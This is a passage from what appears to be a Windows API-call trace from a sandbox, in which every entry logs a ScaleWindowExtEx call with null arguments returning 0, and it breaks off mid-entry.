0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.599] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.600] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.601] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.602] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.603] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0147.604] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, 